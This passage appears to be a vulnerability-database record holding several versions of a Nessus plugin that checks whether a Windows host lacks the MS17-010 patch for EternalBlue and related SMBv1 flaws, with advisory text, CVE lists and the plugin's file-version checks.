It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. 
Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2017-06-28T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=97737", "reporter": "Tenable", "references": ["http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?7bec1941", "https://technet.microsoft.com/library/security/MS17-010", "http://www.nessus.org/u?59db5b5b"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2017-06-29T03:49:19", "history": [], "viewCount": 1448, "enchantments": {}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"$Revision: 1.15 $\");\n script_cvs_date(\"$Date: 2017/06/28 17:30:01 $\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_osvdb_id(\n 153673,\n 153674,\n 153675,\n 153676,\n 153677,\n 153678,\n 155620,\n 155634,\n 155635\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n 
script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. 
Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7bec1941\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n 
hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": [], 
"solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2017-06-29T03:49:19", "differentElements": ["cpe", "modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "a0884af3451344e7b40c0675e284c8c9e0aa09dd32ca9d5889fcf89868f7ad89", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. 
Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2018-03-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=97737", "reporter": "Tenable", "references": ["http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?7bec1941", "https://technet.microsoft.com/library/security/MS17-010", "http://www.nessus.org/u?59db5b5b"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-03-03T18:23:44", "history": [], "viewCount": 1843, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"$Revision: 1.20 $\");\n script_cvs_date(\"$Date: 2018/03/01 14:52:30 $\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_osvdb_id(\n 153673,\n 153674,\n 153675,\n 153676,\n 153677,\n 153678,\n 155620,\n 155634,\n 155635\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", 
value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. 
Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7bec1941\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n 
script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", 
version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, 
os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2018-03-03T18:23:44", "differentElements": ["modified", "references", "sourceData"], "edition": 2}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "5257706fbc80006c6a62e2f5d670ecd2a2165ef160851ffb3965d654f0d7e5cb", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. 
(CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=97737", "reporter": "Tenable", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2019-02-21T01:29:44", "history": [], "viewCount": 2557, "enchantments": {"dependencies": {"modified": "2019-02-21T01:29:44", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
